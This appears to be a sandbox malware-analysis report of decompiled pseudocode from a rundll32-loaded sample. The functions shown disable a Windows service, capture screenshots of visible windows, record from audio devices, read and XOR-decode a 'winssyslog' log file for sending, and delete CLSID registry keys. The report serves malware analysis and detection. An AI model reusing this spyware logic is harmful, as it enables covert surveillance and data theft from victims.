                                                            									if(_t40 != 0) {
                                                            										_v40 = ChangeServiceConfigW(_t36, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            										UnlockServiceDatabase(_t40);
                                                            									}
                                                            								} else {
                                                            									ControlService(_t36, 1,  &_v36);
                                                            									Sleep(0x1f4);
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L10:
                                                            							CloseServiceHandle(_t36);
                                                            							goto L11;
                                                            							L6:
                                                            							_t39 = _t39 + 0x1f4;
                                                            						} while (_t39 < 0x1388);
                                                            						goto L10;
                                                            					}
                                                            					L11:
                                                            					CloseServiceHandle(_t28);
                                                            					return E04655AFE(_v8 ^ _t41);
                                                            				}
                                                            			}
                                                            0x04643976
                                                            0x0464397d
                                                            0x04643985
                                                            0x0464398e
                                                            0x04643997
                                                            0x0464399b
                                                            0x04643a59
                                                            0x046439a1
                                                            0x046439ae
                                                            0x046439b2
                                                            0x046439b4
                                                            0x046439b6
                                                            0x046439c3
                                                            0x00000000
                                                            0x046439c5
                                                            0x046439c9
                                                            0x046439fa
                                                            0x046439fe
                                                            0x04643a1c
                                                            0x04643a1f
                                                            0x04643a1f
                                                            0x046439cb
                                                            0x046439d2
                                                            0x046439dd
                                                            0x00000000
                                                            0x046439dd
                                                            0x046439c9
                                                            0x04643a25
                                                            0x04643a26
                                                            0x00000000
                                                            0x046439e3
                                                            0x046439e3
                                                            0x046439e9
                                                            0x00000000
                                                            0x046439f1
                                                            0x04643a2c
                                                            0x04643a2d
                                                            0x04643a46
                                                            0x04643a46

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04643991
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 046439A8
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 046439BB
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 046439D2
                                                            • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 046439DD
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 046439F4
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04643A15
                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 04643A1F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643A26
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643A2D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                            • String ID:
                                                            • API String ID: 3671983395-0
                                                            • Opcode ID: 36e2b2ae25235a39d4a609ec65cd334757c9e2de924951cd9f8ca306051691be
                                                            • Instruction ID: b079171d7534559f796e1bce8ac5f404bfc826b9b2ac850775e318fccefd8293
                                                            • Opcode Fuzzy Hash: 36e2b2ae25235a39d4a609ec65cd334757c9e2de924951cd9f8ca306051691be
                                                            • Instruction Fuzzy Hash: CE21B832741215ABDB149BA99C8CEBEB7B8FB85711B01116DFD06E2381FE799C448660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046375B0(void* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t18;
                                                            				struct HWND__* _t20;
                                                            				int _t29;
                                                            				void* _t36;
                                                            				intOrPtr* _t44;
                                                            				struct HWND__* _t47;
                                                            				signed int _t48;
                                                            				void* _t50;
                                                            				void* _t55;
                                                            
                                                            				_t50 = (_t48 & 0xffffffc0) - 0x34;
                                                            				_t36 = __ecx;
                                                            				_t18 = CreateCompatibleBitmap( *(__ecx + 0x14),  *(__ecx + 0x3c),  *(__ecx + 0x40));
                                                            				 *(__ecx + 0x1c) = _t18;
                                                            				SelectObject( *(__ecx + 0x18), _t18);
                                                            				_t20 = GetTopWindow(0);
                                                            				if(_t20 == 0) {
                                                            					L12:
                                                            					GetDIBits( *(_t36 + 0x18),  *(_t36 + 0x1c), 0,  *(_t36 + 0x40),  *(_t36 + 0x10), _t36 + 0x38, 0);
                                                            					DeleteObject( *(_t36 + 0x1c));
                                                            					return  *(_t36 + 0x10);
                                                            				}
                                                            				_t47 = GetWindow(_t20, 1);
                                                            				if(_t47 == 0) {
                                                            					goto L12;
                                                            				}
                                                            				_t44 = _t36 + 0x20;
                                                            				do {
                                                            					if(IsWindowVisible(_t47) != 0) {
                                                            						_t55 =  *((intOrPtr*)(_t44 + 0x10)) - 6;
                                                            						if(_t55 > 0 || _t55 == 0 &&  *((intOrPtr*)(_t44 + 0x14)) >= 3) {
                                                            							_t29 = 1;
                                                            						} else {
                                                            							_t29 = 0;
                                                            						}
                                                            						asm("movsd xmm0, [edi+0x8]");
                                                            						asm("movsd [esp], xmm0");
                                                            						E046376B0(_t36, _t47,  *_t44, _t44, _t47,  *((intOrPtr*)(_t44 + 4)), _t29);
                                                            						_t50 = _t50 - 8 + 0x10;
                                                            						SetWindowLongA(_t47, 0xffffffec, GetWindowLongA(_t47, 0xffffffec) | 0x02000000);
                                                            						if( *((intOrPtr*)(_t44 + 0x10)) < 6) {
                                                            							E046377E0(_t47, _t44);
                                                            							_t50 = _t50 + 4;
                                                            						}
                                                            					}
                                                            					_t47 = GetWindow(_t47, 3);
                                                            				} while (_t47 != 0);
                                                            				goto L12;
                                                            			}

                                                            APIs
                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 046375C7
                                                            • SelectObject.GDI32(?,00000000), ref: 046375D4
                                                            • GetTopWindow.USER32(00000000), ref: 046375DC
                                                            • GetWindow.USER32(00000000,00000001), ref: 046375ED
                                                            • IsWindowVisible.USER32(00000000), ref: 04637601
                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 04637644
                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04637653
                                                            • GetWindow.USER32(00000000,00000003), ref: 0463766D
                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0463768D
                                                            • DeleteObject.GDI32(?), ref: 04637696
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                            • String ID:
                                                            • API String ID: 358708372-0
                                                            • Opcode ID: df40e720a7ff743d04cebb2b2f96a1af0ccf3f9585d3b505a7aa7890b3d9c78c
                                                            • Instruction ID: 5b6bf5b0bfbe041d055a0e604c41b6f8884b49407ea4a4376a0956b55bfa68ac
                                                            • Opcode Fuzzy Hash: df40e720a7ff743d04cebb2b2f96a1af0ccf3f9585d3b505a7aa7890b3d9c78c
                                                            • Instruction Fuzzy Hash: 2621CCB1600600EBDB196F68EC4CE6A3B69FF06317F004654FD01DA296FB25E920DBE5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04668810(char _a4) {
                                                            				char _v8;
                                                            
                                                            				_t26 = _a4;
                                                            				_t52 =  *_a4;
                                                            				if( *_a4 != 0x4678988) {
                                                            					E046684AD(_t52);
                                                            					_t26 = _a4;
                                                            				}
                                                            				E046684AD( *((intOrPtr*)(_t26 + 0x3c)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x30)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x34)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x38)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x28)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x2c)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x40)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x44)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x360)));
                                                            				_v8 =  &_a4;
                                                            				E046686D6(5,  &_v8);
                                                            				_v8 =  &_a4;
                                                            				return E04668726(4,  &_v8);
                                                            			}

                                                            APIs
                                                            • _free.LIBCMT ref: 04668824
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 04668830
                                                            • _free.LIBCMT ref: 0466883B
                                                            • _free.LIBCMT ref: 04668846
                                                            • _free.LIBCMT ref: 04668851
                                                            • _free.LIBCMT ref: 0466885C
                                                            • _free.LIBCMT ref: 04668867
                                                            • _free.LIBCMT ref: 04668872
                                                            • _free.LIBCMT ref: 0466887D
                                                            • _free.LIBCMT ref: 0466888B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 27e8fe3acbbb8696a5897caefd1bdd66f33b3523b5d2e7ee0db3949cf90c5fa4
                                                            • Instruction ID: a16425033540dff271fa169ea5a7a368a9b532cd85bc8c7f3ca6c35de183b97c
                                                            • Opcode Fuzzy Hash: 27e8fe3acbbb8696a5897caefd1bdd66f33b3523b5d2e7ee0db3949cf90c5fa4
                                                            • Instruction Fuzzy Hash: 2A11B676111208BFEB01FF64DC40DDD3BB9EF44264B5140A9FE1A8F225EA31EE509B84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04632027
                                                            • waveInGetNumDevs.WINMM ref: 04632032
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311A9
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311B6
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04632082
                                                            • Sleep.KERNEL32(00000096), ref: 0463208D
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046320A9
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046320CE
                                                            • CloseHandle.KERNEL32(?), ref: 046320D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                            • String ID: |
                                                            • API String ID: 1906678132-2343686810
                                                            • Opcode ID: 2a77570d9177fbb95aa0051b6a2013c1c81fb8c28bb489c5b2ade9f6fa1b7331
                                                            • Instruction ID: 0e4dc8fcc9f7e13789954b354c7f829f23473ad6284b2311c0f87ee9401e700a
                                                            • Opcode Fuzzy Hash: 2a77570d9177fbb95aa0051b6a2013c1c81fb8c28bb489c5b2ade9f6fa1b7331
                                                            • Instruction Fuzzy Hash: 4031B671A40304BFFB109F64DC85FAA7BA4EF04715F244159FA04AE2C1EBB5AA40CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E0463AFB0(intOrPtr* __ecx, signed int _a4, char _a5) {
                                                            				intOrPtr* _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t33;
                                                            				void* _t34;
                                                            				signed int* _t35;
                                                            				signed int* _t41;
                                                            				signed int _t43;
                                                            				signed int* _t44;
                                                            				signed char _t47;
                                                            				signed int* _t57;
                                                            				intOrPtr* _t63;
                                                            				void* _t65;
                                                            				intOrPtr* _t67;
                                                            				signed char _t71;
                                                            				signed char _t72;
                                                            				signed int _t74;
                                                            				intOrPtr* _t75;
                                                            				signed int* _t80;
                                                            				void* _t83;
                                                            				void* _t85;
                                                            				void* _t88;
                                                            				intOrPtr _t89;
                                                            				signed int _t91;
                                                            				void* _t94;
                                                            				void* _t101;
                                                            
                                                            				_t67 = __ecx;
                                                            				_push(__ecx);
                                                            				_t33 = _a4;
                                                            				_push(_t88);
                                                            				_t63 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t33;
                                                            				_v8 = __ecx;
                                                            				 *((intOrPtr*)(_t33 + 0x38)) = __ecx;
                                                            				_t34 = CreateEventW(0, 1, 0, 0);
                                                            				_t83 = Sleep;
                                                            				 *(_t63 + 8) = _t34;
                                                            				_t35 =  *0x4687adc; // 0x0
                                                            				 *_t63 = 0x467e8a0;
                                                            				if(_t35 != 0) {
                                                            					L5:
                                                            					_push(_t67);
                                                            					_t7 = _t63 + 4; // 0x0
                                                            					_push(0x3f);
                                                            					_a5 = _t35[0x83];
                                                            					_push(2);
                                                            					_push( &_a4);
                                                            					_a4 = 0x7e;
                                                            					E04631C60( *_t7);
                                                            					_t11 = _t63 + 8; // 0x0
                                                            					WaitForSingleObject( *_t11, 0xffffffff);
                                                            					Sleep(0x96);
                                                            					E0463B6D0(_t63, _t63, _t83, _t88, _t98);
                                                            					_t41 =  *0x4687adc; // 0x0
                                                            					_a4 =  *_t41;
                                                            					while(1) {
                                                            						_t13 = _t63 + 4; // 0x0
                                                            						_t89 =  *_t13;
                                                            						_t43 =  *(_t89 + 0x5c) & 0x0000ffff;
                                                            						if(_t43 != 1) {
                                                            							goto L10;
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t89 + 0x20));
                                                            						if(_t75 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t101 =  *((intOrPtr*)( *_t75 + 0x40))();
                                                            							L14:
                                                            							if(_t101 != 0) {
                                                            								_t80 =  *0x4687adc; // 0x0
                                                            								_t91 = _a4;
                                                            								_t74 =  *_t80;
                                                            								if(_t74 != _t91) {
                                                            									_t50 =  <  ? _t74 : _t74 - _t91;
                                                            									_t85 = ( <  ? _t74 : _t74 - _t91) + ( <  ? _t74 : _t74 - _t91);
                                                            									_t23 = _t85 + 1; // 0x74cb6491
                                                            									_t65 = LocalAlloc(0x40, _t23);
                                                            									_t26 = _t65 + 1; // 0x1
                                                            									 *_t65 = 0x7f;
                                                            									E0465E060(_t26,  &(_t80[0x105]) + _t91 * 2, _t85);
                                                            									_t28 = _t85 + 1; // 0x74cb6491
                                                            									_t94 = _t94 + 8;
                                                            									_push(0x3f);
                                                            									_push(_t65);
                                                            									E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            									LocalFree(_t65);
                                                            									_t57 =  *0x4687adc; // 0x0
                                                            									_t63 = _v8;
                                                            									_a4 =  *_t57;
                                                            								}
                                                            								Sleep(0x12c);
                                                            								continue;
                                                            							}
                                                            						}
                                                            						L18:
                                                            						_t44 =  *0x4687adc; // 0x0
                                                            						__eflags = _t44[0x83];
                                                            						_t71 =  ==  ? 0 :  *0x46878c9 & 0x000000ff;
                                                            						__eflags = _t71;
                                                            						 *0x46878c9 = _t71;
                                                            						return _t63;
                                                            						goto L19;
                                                            						L10:
                                                            						__eflags = _t43 - 2;
                                                            						if(_t43 == 2) {
                                                            							_t72 =  *(_t89 + 0x24);
                                                            							__eflags = _t72;
                                                            							if(_t72 != 0) {
                                                            								_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x40))();
                                                            								__eflags = _t47;
                                                            								if(_t47 != 0) {
                                                            									__eflags =  *(_t89 + 0x48);
                                                            									goto L14;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L18;
                                                            					}
                                                            				} else {
                                                            					 *0x46878c9 = 1;
                                                            					_t88 = 0;
                                                            					asm("o16 nop [eax+eax]");
                                                            					while(_t35 == 0) {
                                                            						Sleep(0x64);
                                                            						if(_t88 == 0x63) {
                                                            							 *0x46878c9 = 0;
                                                            							return _t63;
                                                            						} else {
                                                            							_t35 =  *0x4687adc; // 0x0
                                                            							_t88 = _t88 + 1;
                                                            							_t98 = _t88 - 0x64;
                                                            							if(_t88 < 0x64) {
                                                            								continue;
                                                            							} else {
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            				L19:
                                                            			}
                                                            0x0463b097
                                                            0x0463b09a
                                                            0x0463b09c
                                                            0x0463b0a8
                                                            0x0463b0ab
                                                            0x0463b0ad
                                                            0x0463b0b3
                                                            0x00000000
                                                            0x0463b0b3
                                                            0x0463b0ad
                                                            0x0463b09c
                                                            0x00000000
                                                            0x0463b091
                                                            0x0463aff1
                                                            0x0463aff1
                                                            0x0463aff8
                                                            0x0463affa
                                                            0x0463b000
                                                            0x0463b006
                                                            0x0463b00b
                                                            0x0463b080
                                                            0x0463b08b
                                                            0x0463b00d
                                                            0x0463b00d
                                                            0x0463b012
                                                            0x0463b013
                                                            0x0463b016
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b016
                                                            0x00000000
                                                            0x0463b00b
                                                            0x00000000
                                                            0x0463b000
                                                            0x00000000

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,046878D8,?,04639B4C,?,046878D8,00000000), ref: 0463AFD3
                                                            • Sleep.KERNEL32(00000064,?,?,?,046878D8,?,04639B4C,?,046878D8,00000000), ref: 0463B006
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,046878D8,00000002,0000003F,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B03B
                                                            • Sleep.KERNEL32(00000096,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B046
                                                            • LocalAlloc.KERNEL32(00000040,74CB6491,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B0E3
                                                            • LocalFree.KERNEL32(00000000,00000000,74CB6491,0000003F), ref: 0463B10F
                                                            • Sleep.KERNEL32(0000012C,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B12D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                            • String ID: ~
                                                            • API String ID: 824083382-1707062198
                                                            • Opcode ID: 6384a5241abb5db3dda29af1ea60a716b5548b5de34d53fda2973410851da2df
                                                            • Instruction ID: d49b76a9a464d1ec9b2fcee0aeaa7bf1ded6de122bf5ef3c44d282e95efa5156
                                                            • Opcode Fuzzy Hash: 6384a5241abb5db3dda29af1ea60a716b5548b5de34d53fda2973410851da2df
                                                            • Instruction Fuzzy Hash: 7A519E75600284AFDB14CF28DC84B65BBE5EB59702F1481ADE9099B392E775FD00CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E0463EEC0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t29;
                                                            				signed int _t38;
                                                            				intOrPtr* _t43;
                                                            				signed int _t45;
                                                            				void* _t51;
                                                            				signed int _t54;
                                                            				intOrPtr* _t57;
                                                            				intOrPtr* _t68;
                                                            				void* _t70;
                                                            				void* _t71;
                                                            				signed int* _t72;
                                                            				intOrPtr* _t75;
                                                            				signed int _t76;
                                                            				void* _t77;
                                                            
                                                            				_t29 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t29 ^ _t76;
                                                            				_t57 =  *0x4687aec; // 0x2ab0b60
                                                            				_t70 = __ecx;
                                                            				_t75 =  *_t57;
                                                            				_v612 = __ecx;
                                                            				while(_t75 != _t57) {
                                                            					while( *_t43 ==  *_t68) {
                                                            						_t43 = _t43 + 4;
                                                            						_t68 = _t68 + 4;
                                                            						_t71 = _t71 - 4;
                                                            						if(_t71 >= 0) {
                                                            							continue;
                                                            						}
                                                            						if( *_t43 ==  *_t68) {
                                                            							_t72 =  *(_t75 + 8);
                                                            							_t45 =  *_t72;
                                                            							__eflags = _t45;
                                                            							if(_t45 == 0) {
                                                            								L14:
                                                            								_t72[0xa] = 0;
                                                            								_t73 =  *(_t75 + 8);
                                                            								__eflags =  *(_t75 + 8);
                                                            								if(__eflags != 0) {
                                                            									E0463E280(_t73, __eflags);
                                                            									_push(0x30);
                                                            									E04655B47(_t73);
                                                            									_t77 = _t77 + 8;
                                                            								}
                                                            								 *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)))) =  *_t75;
                                                            								 *((intOrPtr*)( *_t75 + 4)) =  *((intOrPtr*)(_t75 + 4));
                                                            								 *0x4687af0 =  *0x4687af0 - 1;
                                                            								__eflags =  *0x4687af0;
                                                            								L04655B81(_t75);
                                                            								_t70 = _v612;
                                                            								_t77 = _t77 + 4;
                                                            								goto L17;
                                                            							}
                                                            							__eflags =  *(_t45 + 4);
                                                            							_t72[0xa] = 1;
                                                            							_t72[9] = 0;
                                                            							if( *(_t45 + 4) != 0) {
                                                            								L12:
                                                            								_t51 = _t72[8];
                                                            								__eflags = _t51;
                                                            								if(_t51 != 0) {
                                                            									WaitForSingleObject(_t51, 0xffffffff);
                                                            									CloseHandle(_t72[8]);
                                                            									_t72[8] = 0;
                                                            								}
                                                            								goto L14;
                                                            							}
                                                            							_t66 = _t72[0xb];
                                                            							__eflags = _t72[0xb];
                                                            							if(_t72[0xb] == 0) {
                                                            								goto L14;
                                                            							}
                                                            							_t54 = E0463D260(_t66, "stop");
                                                            							__eflags = _t54;
                                                            							if(_t54 == 0) {
                                                            								goto L14;
                                                            							}
                                                            							 *_t54();
                                                            							goto L12;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_t75 =  *_t75;
                                                            					_t70 = _v612;
                                                            				}
                                                            				L17:
                                                            				__eflags = _a4;
                                                            				if(_a4 != 0) {
                                                            					E04646050(_t57, L"Pg",  &_v88, _t70, _t75);
                                                            					wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, _t70);
                                                            					_v612 = 0;
                                                            					_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v612);
                                                            					__eflags = _t38;
                                                            					if(_t38 == 0) {
                                                            						SHDeleteKeyW(_v612, 0x467c5d0);
                                                            						RegCloseKey(_v612);
                                                            					}
                                                            				}
                                                            				__eflags = _v8 ^ _t76;
                                                            				return E04655AFE(_v8 ^ _t76);
                                                            			}

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000001), ref: 0463EF5F
                                                            • CloseHandle.KERNEL32(?), ref: 0463EF68
                                                            • wsprintfW.USER32 ref: 0463EFDD
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463F00A
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463F01F
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463F02B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteHandleObjectOpenSingleWaitwsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s$stop
                                                            • API String ID: 1878782464-96441376
                                                            • Opcode ID: 4d2797b74b5657ff7edf19ea227c9484488527cdf0725762a85812abcdbb05db
                                                            • Instruction ID: 349e8dbc164299e90d76c8c6155f834711889e9f58a5836b29062526f1e757c8
                                                            • Opcode Fuzzy Hash: 4d2797b74b5657ff7edf19ea227c9484488527cdf0725762a85812abcdbb05db
                                                            • Instruction Fuzzy Hash: 3F418D31A00204EFDB24DF64C888B6AB7B9FF48315F14019CE94A97750FB72B945CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E0463B6D0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				long _v532;
                                                            				void* _v536;
                                                            				intOrPtr _v540;
                                                            				void* _v544;
                                                            				signed int _t19;
                                                            				void* _t30;
                                                            				long _t41;
                                                            				void* _t56;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t61;
                                                            				long _t62;
                                                            				signed int _t65;
                                                            
                                                            				_t19 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t19 ^ _t65;
                                                            				_v540 = __ecx;
                                                            				_push(0);
                                                            				_v532 = 0;
                                                            				E04646370(__ebx, L"winssyslog",  &_v528, __edi, __esi, 8);
                                                            				_t58 = CreateFileW( &_v528, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            				_v544 = _t58;
                                                            				_t72 = _t58 - 0xffffffff;
                                                            				if(_t58 == 0xffffffff) {
                                                            					__eflags = _v8 ^ _t65;
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					_push(__ebx);
                                                            					_push(__esi);
                                                            					_t41 = GetFileSize(_t58, 0);
                                                            					_push(_t41);
                                                            					_t61 = L04655B55(L"winssyslog", __esi, _t72);
                                                            					_v536 = _t61;
                                                            					ReadFile(_t58, _t61, _t41,  &_v532, 0);
                                                            					_t30 = 0;
                                                            					if(_t41 != 0) {
                                                            						if(_t41 >= 0x20) {
                                                            							asm("movaps xmm2, [0x467f990]");
                                                            							_t56 = _t41 - (_t41 & 0x0000001f);
                                                            							asm("o16 nop [eax+eax]");
                                                            							do {
                                                            								asm("movups xmm0, [esi+eax]");
                                                            								asm("movaps xmm1, xmm2");
                                                            								asm("pxor xmm1, xmm0");
                                                            								asm("movups [esi+eax], xmm1");
                                                            								asm("movups xmm0, [esi+eax+0x10]");
                                                            								asm("pxor xmm0, xmm2");
                                                            								asm("movups [esi+eax+0x10], xmm0");
                                                            								_t30 = _t30 + 0x20;
                                                            							} while (_t30 < _t56);
                                                            						}
                                                            						while(_t30 < _t41) {
                                                            							 *(_t30 + _t61) =  *(_t30 + _t61) ^ 0x00000058;
                                                            							_t30 = _t30 + 1;
                                                            						}
                                                            					}
                                                            					_t11 = _t41 + 1; // 0x1
                                                            					_t62 = _t11;
                                                            					_t59 = LocalAlloc(0x40, _t62);
                                                            					_t13 = _t59 + 1; // 0x1
                                                            					 *_t59 = 0x7f;
                                                            					E0465E060(_t13, _v536, _t41);
                                                            					_push(0x3f);
                                                            					_push(_t62);
                                                            					E04631C60( *((intOrPtr*)(_v540 + 4)));
                                                            					LocalFree(_t59);
                                                            					L04655B0F(_v536);
                                                            					CloseHandle(_v544);
                                                            					return E04655AFE(_v8 ^ _t65, _t59);
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,74CB6490), ref: 0463B724
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,046878D8,?,74CB6490), ref: 0463B740
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,046878D8,?,74CB6490), ref: 0463B765
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,74CB6490), ref: 0463B7C7
                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F,?,?,00000000,?,74CB6490), ref: 0463B7FB
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,74CB6490), ref: 0463B810
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                            • String ID: $winssyslog
                                                            • API String ID: 245316060-3650450327
